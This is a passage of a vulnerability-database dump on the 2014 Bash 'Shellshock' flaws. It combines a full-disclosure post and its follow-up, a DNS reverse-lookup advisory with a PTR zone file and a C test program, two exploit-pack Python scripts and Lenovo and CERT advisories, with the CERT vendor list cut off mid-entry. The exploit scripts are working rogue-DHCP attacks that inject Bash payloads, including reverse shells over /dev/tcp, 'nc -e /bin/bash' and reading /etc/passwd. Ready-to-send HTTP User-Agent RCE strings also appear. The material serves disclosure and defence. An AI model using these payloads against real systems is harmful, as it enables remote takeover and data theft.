\n-- snip! -- \n \nWhen compiled with the -O2 flag used for bash, on one test system, \nthis produces: \n \nrequested memory = 2 \ncopied text = 28 \n \nThis can lead to heap corruption, with multiple writes possible per \npayload by simply increasing the number of malformed here-docs. The \nconsequences should be fairly clear. \n \n[ There is also a latter call to free() on here_doc_eof in \ndispose_cmd.c, but because of the simultaneous discovery of the much \nsimpler bug '78 discussed in the next section, I have not spent a \nwhole lot of time trying to figure out how to get to that path. ] \n \nPerhaps notably, the ability to specify attacker-controlled addresses \nhinges on the state of --enable-bash-malloc and --enable-mem-scramble \ncompile-time flags; if both are enabled, the memory returned by \nxmalloc() will be initialized to 0xdf, making the prospect of \nexploitation more speculative (essentially depending on whether the \nstack or any other memory region can be grown to overlap with \n0xdfdfdfdf). That said, many Linux distributions disable one or both \nflags and are vulnerable out-of-the-box. It is also of note that \nrelatively few distributions compile bash as PIE, so there is little \nconsolation to be found in ASLR. \n \nSimilarly to the original vulnerability, this issue can be usually \ntriggered remotely through web servers such as Apache (provided that \nthey invoke CGI scripts or PHP / Python / Perl / C / Java servlets \nthat rely on system() or popen()-type libcalls); through DHCP clients; \nand through some MUAs and MTAs. For a more detailed discussion of the \nexposed attack surface, refer to [6]. \n \n== Vulnerability details: CVE-2014-6278 (the \"back to the '90s\" one) == \n \nThe following function definition appearing in the value of any \nenvironmental variable passed to bash 4.2 or 4.3 will lead to \nstraightforward put-your-command-here RCE (again, provided that the \ntargeted instance is not protected with Florian's patch): \n \n() { _; } >_[$($())] { echo hi mom; id; } \n \nA complete example looks like this: \n \nHTTP_COOKIE='() { _; } >_[$($())] { echo hi mom; id; }' bash -c : \n \n...or: \n \nGET /some/script.cgi HTTP/1.0 \nUser-Agent: () { _; } >_[$($())] { id >/tmp/hi_mom; } \n \nNote that the PoC does not work as-is in more ancient versions of \nbash, such as 2.x or 3.x; it might have been introduced with \nxparse_dolparen() starting with bash 4.2 patch level 12 few years \nback, but I have not investigated this in a lot of detail. Florian's \npatch is strongly recommended either way. \n \nThe attack surface through which this flaw may be triggered is roughly \nsimilar to that for CVE-2014-6277 and the original bash bug [6]. \n \n== Additional info == \n \nBoth of these issues were identified in an automated fashion with \namerican fuzzy lop: \n \nhttps://code.google.com/p/american-fuzzy-lop \n \nThe out-of-the-box fuzzer was seeded with a minimal valid function \ndefinition (\"() { foo() { foo; }; >bar; }\") and allowed to run for a \ncouple of hours on a single core. \n \nIn addition to the issues discussed above, the fuzzer also hit three \nof the four previously-reported CVEs. \n \nI initially shared the findings privately with vendors, but because of \nthe intense scrutiny that this codebase is under, the ease of \nreproducing these results with an open-source fuzzer, and the \nnow-broad availability of upstream mitigations, there seems to be \nrelatively little value in continued secrecy. \n \n== References == \n \n[1] http://ftp.gnu.org/gnu/bash/bash-4.3-patches/bash43-025 \n[2] http://ftp.gnu.org/gnu/bash/bash-4.3-patches/bash43-026 \n[3] http://www.openwall.com/lists/oss-security/2014/09/25/13 \n[4] http://ftp.gnu.org/gnu/bash/bash-4.3-patches/bash43-027 \n[5] http://lcamtuf.blogspot.com/2014/09/bash-bug-apply-unofficial-patch-now.html \n[6] http://lcamtuf.blogspot.com/2014/09/quick-notes-about-bash-bug-its-impact.html \n[7] http://www.pcworld.com/article/2688932/improved-patch-tackles-new-shellshock-attack-vectors.html \n \nPS. There are no other bugs in bash. \n \n--------- FOLLOW UP ----------- \n \nDate: Wed, 01 Oct 2014 07:32:57 -0700 \nFrom fulldisclosure-bounces@seclists.org Wed Oct 1 14:37:33 2014 \nFrom: Paul Vixie <paul@redbarn.org> \nTo: Michal Zalewski <lcamtuf@coredump.cx> \nCc: \"fulldisclosure@seclists.org\" <fulldisclosure@seclists.org> \nSubject: Re: [FD] the other bash RCEs (CVE-2014-6277 and CVE-2014-6278) \n \nmichal, thank you for your incredibly informative report here. i have a \nminor correction. \n \n> Michal Zalewski <mailto:lcamtuf@coredump.cx> \n> Wednesday, October 01, 2014 7:21 AM \n> ... \n> \n> Note: over the past few days, Florian's patch has been picked up by \n> major Linux distros (Red Hat, Debian, SUSE, etc), so there is a \n> reasonable probability that you are in good shape. To test, execute \n> this command from within a bash shell: \n> \n> foo='() { echo not patched; }' bash -c foo \n \nthis command need not be executed from within bash. the problem occurs \nwhen bash is run by the command, and the shell that runs the command can \nbe anything. for example, on a system where i have deliberately not \npatched bash, where sh is \"ash\" (almquist shell): \n \n> $ foo='() { echo not patched; }' bash -c foo \n> not patched \n \nhere's me testing it from within tcsh: \n \n> % env foo='() { echo not patched; }' bash -c foo \n> not patched \n> % (setenv foo '() { echo not patched; }'; bash -c foo) \n> not patched \n \nthis is a minor issue, but i've found in matters of security bug \nreports, tests, and discussions, that any minor matter can lead to deep \nmisunderstanding. \n \nthanks again for your excellent report, and your continuing work on this \nissue. \n \nvixie \n \n`\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/128520/bash-me-some-more.txt"}, {"lastseen": "2016-12-05T22:23:06", "description": "", "published": "2014-10-13T00:00:00", "type": "packetstorm", "title": "DNS Reverse Lookup Shellshock", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-7169", "CVE-2014-6277", "CVE-2014-6278", "CVE-2014-7187", "CVE-2014-6271", "CVE-2014-3671", "CVE-2014-7186"], "modified": "2014-10-13T00:00:00", "id": "PACKETSTORM:128650", "href": "https://packetstormsecurity.com/files/128650/DNS-Reverse-Lookup-Shellshock.html", "sourceData": "`-----BEGIN PGP SIGNED MESSAGE----- \nHash: SHA1 \n \nSecurity Advisory \n \nDNS Reverse Lookup as a vector for the Bash vulnerability (CVE-2014-6271 et.al.) \n \nCVE-2014-3671 \n \nreferences: \nCVE-2014-6271, CVE-2014-7169, CVE-2014-6277, CVE-2014-6278 \nCVE-2014-7186 and, CVE-2014-7187 \n \n* Summary: \n \nAbove CVEs detail a number of flaws in bash prior related to the parsing \nof environment variables (aka BashBug, Shellshock). Several networked \nvectors for triggering this bug have been discovered; such as through \ndhcp options and CGI environment variables in webservers [1]. \n \nThis document is to advise you of an additional vector; through a \nreverse lookup in DNS; and where the results of this lookup are \npassed, unsanitized, to an environment variable (e.g. as part of \na batch process). \n \nThis vector is subtly different from a normal attack vector, as the \nattacker can 'sit back' and let a (legitimate) user trigger the \nissue; hence keeping the footprint for a IDS or WAAS to act on small. \n \n* Resolvers/systems affected: \n \nAt this point of time the stock resolvers (in combination with the libc \nlibrary) of OSX 10.9 (all versions) and 10.10/R2 are the only known \nstandard installations that pass the bash exploit string back and \nup to getnameinfo(). \n \nThat means that UNpatched systems are vulnerable through this vector \nPRIOR to the bash update documented in http://support.apple.com/kb/DL1769. \n \nMost other OS-es (e.g. RHEL6, Centos, FreeBSD 7 and up, seem \nunaffected in their stock install as libc/libresolver and DNS use \ndifferent escaping mechanisms (octal v.s. decimal). \n \nWe're currently following investing a number of async DNS resolvers \nthat are commonly used in DB cache/speed optimising products and \napplication level/embedded firewall systems. \n \nVersions affected: \n \nSee above CVEs as your primary source. \n \n* Resolution and Mitigation: \n \nIn addition to the mitigations listed in above CVEs - IDSes and similar \nsystems may be configured to parse DNS traffic in order to spot the \noffending strings. \n \nAlso note that Apple DL1769 addresses the Bash issue; NOT the vector \nthrough the resolver. \n \n* Reproducing the flaw: \n \nA simple zone file; such as: \n \n$TTL 10; \n$ORIGIN in-addr.arpa. \n@ IN SOA ns.boem.wleiden.net dirkx.webweaving.org ( \n666 ; serial \n360 180 3600 1800 ; very short lifespan. \n) \nIN NS 127.0.0.1 \n* PTR \"() { :;}; echo CVE-2014-6271, CVE-201407169, RDNS\" \n \ncan be used to create an environment in which to test the issue with existing code \nor with the following trivial example: \n \n#include <sys/socket.h> \n#include <netdb.h> \n#include <assert.h> \n#include <arpa/inet.h> \n#include <stdio.h> \n#include <stdlib.h> \n#include <unistd.h> \n#include <netinet/in.h> \n \nint main(int argc, char ** argv) { \nstruct in_addr addr; \nstruct sockaddr_in sa; \nchar host[1024]; \n \nassert(argc==2); \nassert(inet_aton(argv[1],&addr) == 1); \n \nsa.sin_family = AF_INET; \nsa.sin_addr = addr; \n \nassert(0==getnameinfo((struct sockaddr *)&sa, sizeof sa, \nhost, sizeof host, NULL, 0, NI_NAMEREQD)); \n \nprintf(\"Lookup result: %s\\n\\n\", host); \n \nassert(setenv(\"REMOTE_HOST\",host,1) == 0); \nexecl(\"/bin/bash\",NULL); \n} \n \n \nCredits and timeline \n \nThe flaw was found and reported by Stephane Chazelas (see CVE-2014-6271 \nfor details). Dirk-Willem van Gulik (dirkx(at)webweaving.org) found \nthe DNS reverse lookup vector. \n \n09-04-2011 first reported. \n2011, 2014 issue verified on various embedded/firewall/waas \nsystems and reported to vendors. \n??-09-2014 Apple specific exploited seen. \n11-10-2014 Apple confirms that with DL1769 in place that \n\"The issue that remains, while it raises \ninteresting questions, is not a security \nissue in and of itself.\" \n \n* Common Vulnerability Scoring (Version 2) and vector: \n \nSee CVE-2014-6271. \n \n1:https://github.com/mubix/shellshocker-pocs/blob/master/README.md) \n1.10 / : 1726 $ \n-----BEGIN PGP SIGNATURE----- \nVersion: GnuPG/MacGPG2 v2.0.22 (Darwin) \nComment: This message is encrypted and/or signed with PGP (gnu-pg, gpg). Contact dirkx@webweaving.org if you cannot read it. \n \niQCVAwUBVDujjDGmPZbsFAuBAQKGqwP+OOzdL8PDZF7Ckpk1UCxZZoWYvvGUHBqs \ndE8ioLaQsRDKJ+V2EbBGHmSucYLPqBVfRYaYar21KCl6DAcxzQmxhymxxpRjBPsP \nuauqW7dYZQASDkKG9Rn0KA4dXNo9GjrJMrTcwkfkoNb5EtVtiMDX8VXoZ4SqLJS0 \nv5s8ZtQiIw4= \n=I6vK \n-----END PGP SIGNATURE----- \n \n \n`\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/128650/dnsbash-exec.txt"}], "exploitpack": [{"lastseen": "2020-04-01T19:05:48", "description": "\ndhclient 4.1 - Bash Environment Variable Command Injection (Shellshock)", "edition": 1, "published": "2014-09-29T00:00:00", "title": "dhclient 4.1 - Bash Environment Variable Command Injection (Shellshock)", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-7169", "CVE-2014-6277", "CVE-2014-6278", "CVE-2014-7187", "CVE-2014-7186"], "modified": "2014-09-29T00:00:00", "id": "EXPLOITPACK:09BAFC0653DB54EBD16EF2C94A327987", "href": "", "sourceData": "#!/usr/bin/python\n# Exploit Title: ShellShock dhclient Bash Environment Variable Command Injection PoC\n# Date: 2014-09-29 \n# Author: @fdiskyou\n# e-mail: rui at deniable.org\n# Version: 4.1\n# Tested on: Debian, Ubuntu, Kali\n# CVE: CVE-2014-6277, CVE-2014-6278, CVE-2014-7169, CVE-2014-7186, CVE-2014-7187\nfrom scapy.all import *\n\nconf.checkIPaddr = False\nfam,hw = get_if_raw_hwaddr(conf.iface)\nvictim_assign_ip = \"10.0.1.100\"\nserver_ip = \"10.0.1.2\"\ngateway_ip = \"10.0.1.2\"\nsubnet_mask = \"255.255.255.0\"\ndns_ip = \"8.8.8.8\"\nspoofed_mac = \"00:50:56:c0:00:01\"\npayload = \"() { ignored;}; echo 'moo'\"\npayload_2 = \"() { ignored;}; /bin/nc -e /bin/bash localhost 7777\"\npayload_3 = \"() { ignored;}; /bin/bash -i >& /dev/tcp/10.0.1.1/4444 0>&1 &\"\npayload_4 = \"() { ignored;}; /bin/cat /etc/passwd\"\npayload_5 = \"() { ignored;}; /usr/bin/wget http://google.com\"\nrce = payload_5\n \ndef toMAC(strMac):\n cmList = strMac.split(\":\")\n hCMList = []\n for iter1 in cmList:\n hCMList.append(int(iter1, 16))\n hMAC = struct.pack('!B', hCMList[0]) + struct.pack('!B', hCMList[1]) + struct.pack('!B', hCMList[2]) + struct.pack('!B', hCMList[3]) + struct.pack('!B', hCMList[4]) + struct.pack('!B', hCMList[5])\n return hMAC\n \ndef detect_dhcp(pkt):\n# print 'Process ', ls(pkt)\n if DHCP in pkt:\n # if DHCP Discover then DHCP Offer\n if pkt[DHCP].options[0][1]==1:\n clientMAC = pkt[Ether].src\n print \"DHCP Discover packet detected from \" + clientMAC\n \n sendp(\n Ether(src=spoofed_mac,dst=\"ff:ff:ff:ff:ff:ff\")/\n IP(src=server_ip,dst=\"255.255.255.255\")/\n UDP(sport=67,dport=68)/\n BOOTP(\n op=2,\n yiaddr=victim_assign_ip,\n siaddr=server_ip,\n giaddr=gateway_ip,\n chaddr=toMAC(clientMAC),\n xid=pkt[BOOTP].xid,\n sname=server_ip\n )/\n DHCP(options=[('message-type','offer')])/\n DHCP(options=[('subnet_mask',subnet_mask)])/\n DHCP(options=[('name_server',dns_ip)])/\n DHCP(options=[('lease_time',43200)])/\n DHCP(options=[('router',gateway_ip)])/\n DHCP(options=[('dump_path',rce)])/\n DHCP(options=[('server_id',server_ip),('end')]), iface=\"vmnet1\"\n )\n print \"DHCP Offer packet sent\"\n \n # if DHCP Request than DHCP ACK\n if pkt[DHCP] and pkt[DHCP].options[0][1] == 3:\n clientMAC = pkt[Ether].src\n print \"DHCP Request packet detected from \" + clientMAC\n \n sendp(\n Ether(src=spoofed_mac,dst=\"ff:ff:ff:ff:ff:ff\")/\n IP(src=server_ip,dst=\"255.255.255.255\")/\n UDP(sport=67,dport=68)/\n BOOTP(\n op=2,\n yiaddr=victim_assign_ip,\n siaddr=server_ip,\n giaddr=gateway_ip,\n chaddr=toMAC(clientMAC),\n xid=pkt[BOOTP].xid\n )/\n DHCP(options=[('message-type','ack')])/\n DHCP(options=[('subnet_mask',subnet_mask)])/\n DHCP(options=[('lease_time',43200)])/\n DHCP(options=[('router',gateway_ip)])/\n DHCP(options=[('name_server',dns_ip)])/\n DHCP(options=[('dump_path',rce)])/\n DHCP(options=[('server_id',server_ip),('end')]), iface=\"vmnet1\"\n )\n print \"DHCP Ack packet sent\"\n \ndef main():\n #sniff DHCP requests\n sniff(filter=\"udp and (port 67 or 68)\", prn=detect_dhcp, iface=\"vmnet1\")\n \nif __name__ == '__main__':\n sys.exit(main())", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-04-01T19:04:17", "description": "\nGNU bash 4.3.11 - Environment Variable dhclient", "edition": 1, "published": "2014-10-02T00:00:00", "title": "GNU bash 4.3.11 - Environment Variable dhclient", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-7169", "CVE-2014-6277", "CVE-2014-6278", "CVE-2014-7187", "CVE-2014-7186"], "modified": "2014-10-02T00:00:00", "id": "EXPLOITPACK:9199830C2B5794BCE4073DDC29B86CF4", "href": "", "sourceData": "#!/usr/bin/python\n# Exploit Title: dhclient shellshocker\n# Google Dork: n/a\n# Date: 10/1/14\n# Exploit Author: @0x00string\n# Vendor Homepage: gnu.org\n# Software Link: http://ftp.gnu.org/gnu/bash/bash-4.3.tar.gz\n# Version: 4.3.11\n# Tested on: Ubuntu 14.04.1\n# CVE : CVE-2014-6277,CVE-2014-6278,CVE-2014-7169,CVE-2014-7186,CVE-2014-7187\n# ______ ______ ______ _ \n# / __ | / __ |/ __ | _ (_) \n#| | //| |_ _| | //| | | //| | ___| |_ ____ _ ____ ____ ___ \n#| |// | ( \\ / ) |// | | |// | |/___) _) / ___) | _ \\ / _ |/___)\n#| /__| |) X (| /__| | /__| |___ | |__| | | | | | ( ( | |___ |\n# \\_____/(_/ \\_)\\_____/ \\_____/(___/ \\___)_| |_|_| |_|\\_|| (___/ \n# (_____| \n# _ _ _ _ \n# | | | | (_) _ \n# _ | | | _ ____| |_ ____ ____ | |_ \n# / || | || \\ / ___) | |/ _ ) _ \\| _) \n#( (_| | | | ( (___| | ( (/ /| | | | |__ \n# \\____|_| |_|\\____)_|_|\\____)_| |_|\\___) \n#\n# _ _ _ _ _ \n# | | | | | | | | | \n# ___| | _ ____| | | ___| | _ ___ ____| | _ ____ ____ \n# /___) || \\ / _ ) | |/___) || \\ / _ \\ / ___) | / ) _ )/ ___)\n#|___ | | | ( (/ /| | |___ | | | | |_| ( (___| |< ( (/ /| | \n#(___/|_| |_|\\____)_|_(___/|_| |_|\\___/ \\____)_| \\_)____)_| \n\n# this buddy listens for clients performing a DISCOVER, a later version will exploit periodic REQUESTs, which can sometimes be prompted by causing IP conflicts\n# once a broadcast DISCOVER packet has been detected, the XID, MAC and requested IP are pulled from the pack and a corresponding OFFER and ACK are generated and pushed out\n# The client is expected to reject the offer in preference of their known DHCP server, but will still process the packet, triggering the vulnerability.\n# can use option 114, 56 or 61, though is hardcoded to use 114 as this is merely a quick and dirty example.\n\nimport socket, struct\ndef HexToByte( hexStr ): \n b = []\n h = ''.join( h.split(\" \") )\n for i in range(0, len(h), 2):\n b.append( chr( int (h[i:i+2], 16 ) ) )\n return ''.join( b )\n\nrport = 68\nlport = 67\n\nbsock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\nsock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n\nbsock.bind((\"<broadcast>\", lport))\n\nwhile True:\n\n\tOP = \"72\" # 56, Message - RFC 1533,2132. 61, Client-identifier - RFC 1533,2132,4361 or 114, URL - RFC 3679 are currently known to work, here we use 114\n\tURL = \"() { :;}; bash -i >& /dev/tcp/10.0.0.1/1337 0>&1\".encode(\"hex\")\n\tURLLEN = chr(len(URL) / 2).encode(\"hex\")\n\tEND = \"03040a000001ff\"\n\tbroadcast_get, (bcrhost, rport) = bsock.recvfrom(2048)\n\thexip = broadcast_get[245:249]\n\trhost = str(ord(hexip[0])) + \".\" + str(ord(hexip[1])) + \".\" + str(ord(hexip[2])) + \".\" + str(ord(hexip[3]))\n\tXID = broadcast_get[4:8].encode(\"hex\")\n\tchaddr = broadcast_get[29:34].encode(\"hex\")\n\tprint \"[+]\\tgot broadcast with XID \" + XID + \" requesting IP \" + rhost + \"\\n\"\n\tOFFER = \"02010600\" + XID + \"00000000000000000a0000430a0000010000000000\" + chaddr + \"000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000006382536335010236040a000001330400000e103a04000007083b0400000c4e0104ffffff001c040a0000ff06040a0000010f034c4f4c0c076578616d706c65\" + OP + URLLEN + URL + END\n\tOFFER_BYTES = HexToByte(OFFER)\n\tACK = \"02010600\" + XID + \"00000000000000000a0000430a0000010000000000\" + chaddr + \"000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000006382536335010536040a000001330400000e103a04000007083b0400000c4e0104ffffff001c040a0000ff06040a0000010f034c4f4c0c076578616d706c65\" + OP + URLLEN + URL + END\n\tACK_BYTES = HexToByte(ACK)\n\tprint \"[+]\\tsending evil offer\\n\"\n\tsock.sendto(OFFER_BYTES, (rhost, rport))\n\tbroadcast_get2 = bsock.recvfrom(2048)\n\tprint \"[+]\\tassuming request was received, sending ACK\\n\"\n\tsock.sendto(ACK_BYTES, (rhost, rport))", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "lenovo": [{"lastseen": "2018-02-21T17:01:52", "bulletinFamily": "info", "cvelist": ["CVE-2014-7169", "CVE-2014-6277", "CVE-2014-7187", "CVE-2014-6271", "CVE-2014-7186"], "description": "**Lenovo Security Advisory:**** **LEN-2014-003\n\n**Potential Impact:** Execution of arbitrary code\n\n**Severity****:** High\n\n**Summary: ** \nGNU Bash is the common command-line shell used in many Linux/UNIX systems. The vulnerability is also referred to as \u201cShellshock. \u201d Exploitation of this vulnerability may allow a remote attacker to execute arbitrary code on an affected system. More information about this issue is available at [CVE-2014-7169](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-7169>).\n\n**Description:** \nThe GNU Bash Remote Code Execution Vulnerability (CVE-2014-6271 and CVE-2014-7169) could allow attackers to gain control over a targeted computer if exploited successfully, giving them access to your data and networks. The vulnerability leverages the Bash shell, a command language interpreter. An attacker could attach malicious code to environment variables that affect the way processes are run on a computer.\n\n**Affected Products:**\n", "edition": 1, "modified": "2016-11-16T00:00:00", "published": "2016-11-16T00:00:00", "id": "LENOVO:PS500044-NOSID", "href": "https://support.lenovo.com/us/en/product_security/gnu_shellshock", "type": "lenovo", "title": "GNU Bourne-Again Shell (Bash) 'Shellshock'", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "cert": [{"lastseen": "2020-09-18T20:41:43", "bulletinFamily": "info", "cvelist": ["CVE-2014-6271", "CVE-2014-6277", "CVE-2014-7169", "CVE-2014-7186", "CVE-2014-7187"], "description": "### Overview \n\nGNU Bash 4.3 and earlier contains a command injection vulnerability that may allow remote code execution.\n\n### Description \n\nUPDATE: New CVE-IDs added for incomplete patches. Additional resources added and vendor patch information updated.[](<http://cwe.mitre.org/data/definitions/78.html>)\n\n[**CWE-78**](<http://cwe.mitre.org/data/definitions/78.html>)**: OS Command Injection** \n \nBash supports exporting of shell functions to other instances of bash using an environment variable. This environment variable is named by the function name and starts with a \"() {\" as the variable value in the function definition. When Bash reaches the end of the function definition, rather than ending execution it continues to process shell commands written after the end of the function. This vulnerability is especially critical because Bash is widespread on many types of devices (UNIX-like operating systems including Linux and Mac OS X), and because many network services utilize Bash, causing the vulnerability to be network exploitable. Any service or program that sets environment variables controlled by an attacker and calls Bash may be vulnerable. \n \nRed Hat has developed the following test: \n \n`$ env x='() { :;}; echo vulnerable' bash -c \"echo this is a test\"` \n \nThe website [shellshocker.net](<https://shellshocker.net/>) from the health IT team at Medical Informatics Engineering has developed several tests for websites and hosts and includes update information. \n \nThis vulnerability is being actively exploited. \n \n--- \n \n### Impact \n\nA malicious attacker may be able to execute arbitrary code at the privilege level of the calling application. \n \n--- \n \n### Solution \n\n**Apply an Update** \nThe first several set of patches (for CVE-2014-6271) do not completely resolve the vulnerability. CVE-2014-7169, CVE-2014-6277, CVE-2014-7186, and CVE 2014-7187 identify the remaining aspects of this vulnerability. Red Hat has provided a [support article ](<https://access.redhat.com/articles/1200223>)with updated information and workarounds. \n \nCERT/CC has also included vendor patch information below when notified of an update. \n \n--- \n \n### Vendor Information\n\nMany UNIX-like operating systems, including Linux distributions and Apple Mac OS X include Bash and are likely to be vulnerable. Contact your vendor for information about updates or patches. This Red Hat[ support article](<https://access.redhat.com/node/1200223>) and [blog post](<https://access.redhat.com/node/1200223>) describe ways that Bash can be called from other programs, including network vectors such as CGI, SSH, and DHCP. [Shell Shock Exploitation Vectors](<https://www.dfranke.us/posts/2014-09-27-shell-shock-exploitation-vectors.html>) describes other ways this vulnerability could be exploited. \n \n--- \n \n252743\n\nFilter by status: All Affected Not Affected Unknown\n\nFilter by content: __ Additional information available\n\n__ Sort by: Status Alphabetical\n\nExpand all\n\n**Javascript is disabled. Click here to view vendors.**\n\n### Apple Inc. Affected\n\nNotified: September 25, 2014 Updated: October 01, 2014 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <http://support.apple.com/kb/ht6495>\n\n### Avaya, Inc. __ Affected\n\nNotified: September 25, 2014 Updated: September 29, 2014 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nSee the following URL for more information from the vendor.\n\n### Vendor References\n\n * <https://downloads.avaya.com/css/P8/documents/100183009>\n\n### Addendum\n\nThe Avaya Communications Server (CS) 1000 Rls 6 has been reported to be vulnerable.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23252743 Feedback>).\n\n### Barracuda Networks Affected\n\nNotified: September 25, 2014 Updated: September 27, 2014 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <https://www.barracuda.com/support/techalerts>\n\n### Blue Coat Systems Affected\n\nNotified: September 25, 2014 Updated: September 27, 2014 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * [https://kb.bluecoat.com/index?page=content&id=SA82](<https://kb.bluecoat.com/index?page=content&id=SA82>)\n\n### CentOS Affected\n\nUpdated: September 27, 2014 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <http://lists.centos.org/pipermail/centos/2014-September/146099.html>\n\n### Check Point Software Technologies Affected\n\nNotified: September 25, 2014 Updated: September 27, 2014 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * [https://supportcenter.checkpoint.com/supportcenter/portal?eventSubmit_doGoviewsolutiondetails=&solutionid=sk102673 ](<https://supportcenter.checkpoint.com/supportcenter/portal?eventSubmit_doGoviewsolutiondetails=&solutionid=sk102673\n>)\n * <http://www.checkpoint.com/blog/protecting-shellshock/index.html>\n\n### Cisco Systems, Inc. Affected\n\nNotified: September 25, 2014 Updated: September 26, 2014 \n\n**Statement Date: September 26, 2014**\n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20140926-bash>\n\n### Cygwin __ Affected\n\nUpdated: September 26, 2014 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Addendum\n\n<https://cygwin.com/ml/cygwin-announce/2014-09/msg00033.html>\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23252743 Feedback>).\n\n### D-Link Systems, Inc. __ Affected\n\nNotified: September 25, 2014 Updated: October 07, 2014 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nAll D-Link Devices and Software have been cleared and are not affected by this \nvulnerability. All D-Link Services have been audited for the use of bash shell \nimplementations. Based on the results of the audit we have applied appropriate \nupdates, if needed, to close this potential vulnerability. D-Link continues \nto monitor CERT incase of further issues are reported about the Bash Shell. \n(Edited: 10/06/2014 15:52 PST) \n\n### Vendor Information \n\nPlease contact at: security@dlink.com\n\n### Vendor References\n\n * <http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10044>\n\n### Debian GNU/Linux Affected\n\nNotified: September 25, 2014 Updated: September 27, 2014 \n\n**Statement Date: September 25, 2014**\n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <https://security-tracker.debian.org/tracker/source-package/bash>\n * <https://www.debian.org/security/2014/dsa-3035>\n * <https://www.debian.org/security/2014/dsa-3032>\n\n### Dell Computer Corporation, Inc. __ Affected\n\nUpdated: September 27, 2014 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <https://support.software.dell.com/k1000/kb/133191>\n\n### Addendum\n\nDell KACE systems use Bash.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23252743 Feedback>).\n\n### Extreme Networks Affected\n\nNotified: September 25, 2014 Updated: October 01, 2014 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <http://learn.extremenetworks.com/rs/extreme/images/VN-2014-001-%20GNU%20Bash%20Threats%20-CVE-2014-7169%20rev01.pdf>\n\n### F5 Networks, Inc. Affected\n\nNotified: September 25, 2014 Updated: September 26, 2014 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <http://support.f5.com/kb/en-us/solutions/public/15000/600/sol15629.html>\n\n### Fedora Project Affected\n\nNotified: September 25, 2014 Updated: September 27, 2014 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <http://fedoramagazine.org/shellshock-update-bash-packages-that-resolve-cve-2014-6271-and-cve-2014-7169-available/>\n\n### FireEye Affected\n\nUpdated: October 02, 2014 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * 